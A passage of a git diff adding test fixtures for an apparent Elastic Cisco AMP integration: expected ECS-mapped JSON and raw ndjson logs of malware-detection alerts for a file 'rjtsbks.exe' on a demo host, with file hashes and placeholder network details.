", + "kind": "alert", + "start": "2021-01-15T10:17:41.000Z", + "action": "Executed malware", + "id": 
"1489955900291000600", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.3372C1EDAB-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296272 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:39.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469691446Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251516445164000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DFC.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251516445163601", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:39.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": 
"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469693323Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251516445164000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DFC.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251516445163569", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file 
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log new file mode 100644 index 00000000000..4a0581fcd4d --- /dev/null +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log 
@@ -0,0 +1,45 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
